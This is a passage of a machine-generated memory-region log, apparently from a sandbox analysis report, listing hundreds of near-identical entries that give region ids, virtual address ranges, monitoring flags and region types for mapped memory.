15052 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15053 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15054 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15055 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15056 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15057 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15058 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15059 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15060 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15061 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 15062 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15063 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15064 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15065 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15066 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15067 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15068 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15069 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15070 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15071 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15072 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15073 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15074 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15075 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15076 start_va = 0x2360000 end_va = 0x2360fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 15077 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15078 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15079 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15080 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15081 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15082 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15083 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15084 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15085 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15086 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15087 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15088 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15089 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15090 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15091 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15092 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15093 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15094 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15095 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15096 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15097 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15098 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15099 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15100 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15101 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15102 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15103 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15104 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15105 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15106 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15107 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15108 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15109 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15110 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15111 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15112 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15113 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15114 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 15115 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15116 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15117 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15118 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15119 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15120 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15121 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15122 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15123 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15124 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15125 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15126 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15127 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15128 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15129 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15130 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15131 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15132 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15133 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15134 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15135 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15136 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15137 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15138 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15139 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15140 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15141 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15142 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15143 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15144 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15145 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15146 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15147 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15148 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15149 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15150 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15151 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15152 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15153 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15154 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15155 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15156 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 15157 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15158 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15159 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15160 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15161 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 15162 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15163 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15164 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15165 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15166 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15167 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15168 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15169 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15170 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15171 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15172 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15173 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15174 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15175 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15176 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15177 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15178 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15179 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15180 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15181 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15182 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15183 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15184 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15185 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15186 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15187 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15188 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15189 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15190 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15191 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15192 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15193 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15194 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15195 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15196 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15197 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15198 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15199 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15200 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15201 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15202 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15203 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15204 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15205 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15206 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15207 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15208 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15209 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15210 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15211 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15212 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15213 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15214 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15215 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15216 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15217 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15218 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 15219 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 15220 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15221 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15222 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 15223 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15224 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15225 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15226 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15227 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15228 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15229 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15230 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15231 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15232 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15233 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15234 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15235 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15236 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15237 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15238 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 15239 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 